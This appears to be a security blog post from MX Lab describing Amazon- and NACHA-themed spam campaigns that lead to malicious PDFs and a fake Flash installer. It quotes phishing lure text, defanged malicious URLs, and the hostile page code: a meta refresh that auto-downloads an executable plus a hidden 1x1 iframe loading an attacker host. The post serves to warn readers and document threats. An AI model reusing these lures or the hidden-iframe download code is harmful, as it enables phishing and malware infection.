Amazon orders and email confirmation leads to PDF malware


Since last week, MX Lab intercepts emails with requests to confirm your email address or orders processed by Amazon. This campaign has been received in quite large quantities and we have been investigating what they are about.

At first we thought they where phishing emails but so far we haven’t been able to establish connection with the sites that are mentioned in the URLs included in the message.

This is the latest screenshot of an email requesting confirmation of the email. The lay out is very well done as you can see. The Amazon images are embedded in the message through an image tag and they come directly from servers from Amazon.

But, the links in the email as obfuscated and point to web sites like:

hxxp://busnwsonline.com/index.php?pid=14

Which redirects in this case to:

hxxp://lunchstroke.ru:8080/index.php?pid=14

Following the URL will lead you to short-lived web sites hosting malicious PDF files. The PDF file appears to be offered in an HTML iframe tag so that it can be launched with no interference.

Adobe Flash malware in what appears as phishing emails


MX Lab intercepted some emails that appear to be genuine phishing emails but when investigating the included URLs further, they are in fact an attempt to install malware on a computer in the form of an important Flash Player update from Adobe.

Online Banking Account Alert

The first example comes from the spoofed email address “Electronic Payments Association <[email protected]>” with the subject “Online Banking Account Alert!” and this is the body of the email:

You must submit verification documents to continue using your account without interruption. To view the details of this request and submit the required information, click on the following link (or copy & paste it into your web browser):

hxxp://astroereyna.gr/

We thank you for your assistance in this matter.

When visiting the web site with Firefox we got the message “Sorry, you need to install flash player to see this content…” and our donwload manager opened to download the file adobe_flash_install.exe. This is the code of the web site page:

Sorry, you need to install flash player to see this content...
<meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/
adobe_flash_install.exe" />
<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1'
 height='1' style='visibility: hidden;'></iframe>

However, on Safari we got an HTML frameset to access the web site. It appears that some Javascript redirection is active.

An unauthorized transaction billed from your bank account

The second example comes from the spoofed address “Electronic Payments Association <[email protected]>”, has the subject “An unauthorized transaction billed from your bank account” and this is the body of the email:

Dear bank account holder,

The ACH transaction, recently initiated from your bank account, was rejected by the Electronic Payments Association. Please review the transaction report by clicking the link below:

Unauthorized ACH Transaction Report

——————————————————————

Copyright ©2010 by NACHA - The Electronic Payments Association

The text “Unauthorized ACH Transaction Report” contains a link to a fast flux domain. Following the link gives us the following screen in the browser, included with an download of the file adobe_flash_install.exe.

At the time of writing, no AV engines at Virus Total did detect the threat. Virus Total permlink and MD5: 97732f717f50c38714a3f9c8d8c6274a.

Follow

Get every new post delivered to your Inbox.

Join 1,577 other followers